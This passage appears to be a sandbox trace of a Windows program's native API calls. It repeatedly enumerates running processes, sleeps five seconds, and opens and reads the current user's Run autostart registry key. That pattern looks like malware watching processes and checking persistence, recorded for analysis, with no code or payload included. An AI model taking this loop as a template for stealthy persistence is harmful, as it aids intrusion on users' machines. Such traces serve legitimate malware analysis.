[0182.163] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0182.170] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0182.171] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0182.173] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0182.175] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0182.175] NtClose (Handle=0x274) returned 0x0 [0182.175] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0182.176] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0182.178] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0182.179] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0182.179] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0182.185] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0182.186] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0182.188] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0182.191] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0182.191] NtClose (Handle=0x274) returned 0x0 [0182.191] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0182.192] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0182.194] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0182.195] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0182.195] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0182.202] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0182.203] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0182.205] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0182.206] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0182.206] NtClose (Handle=0x274) returned 0x0 [0182.206] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0182.206] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0182.210] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0182.211] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0182.211] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0182.217] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0182.218] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0182.220] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0182.221] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0182.221] NtClose (Handle=0x274) returned 0x0 [0182.221] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0182.222] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0182.224] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0182.225] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0182.225] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0182.232] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0182.233] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0182.234] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0182.236] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0182.236] NtClose (Handle=0x274) returned 0x0 [0182.236] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0182.236] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0182.239] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0182.239] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0182.239] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0182.246] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0182.247] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0182.249] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0182.249] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0182.249] NtClose (Handle=0x274) returned 0x0 [0182.249] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0182.250] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0182.253] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0182.254] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0182.254] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0182.261] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0182.262] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0182.264] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0182.265] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0182.266] NtClose (Handle=0x274) returned 0x0 [0182.266] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0182.266] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0182.268] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0182.269] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0182.269] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0182.277] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0182.278] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0182.280] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0182.281] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0182.281] NtClose (Handle=0x274) returned 0x0 [0182.281] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0182.281] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0182.284] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0182.285] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0182.285] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0182.292] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0182.293] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0182.295] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0182.296] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0182.296] NtClose (Handle=0x274) returned 0x0 [0182.296] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0182.296] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0182.300] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0182.301] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0182.301] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0182.308] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0182.309] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0182.310] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0182.312] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0182.312] NtClose (Handle=0x274) returned 0x0 [0182.312] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0182.312] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0182.315] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0182.315] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0182.316] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0182.319] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0182.321] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0182.323] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0182.323] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0182.324] NtClose (Handle=0x274) returned 0x0 [0182.324] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0182.324] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0182.326] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0182.326] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0182.326] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0182.331] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0182.331] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0182.333] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0182.333] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0182.333] NtClose (Handle=0x274) returned 0x0 [0182.333] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0182.334] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0182.336] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0182.336] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0182.336] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0182.341] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0182.342] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0182.343] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0182.344] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0182.344] NtClose (Handle=0x274) returned 0x0 [0182.344] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0182.344] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0182.346] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0182.346] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0182.346] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0182.350] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0182.351] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0182.353] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, 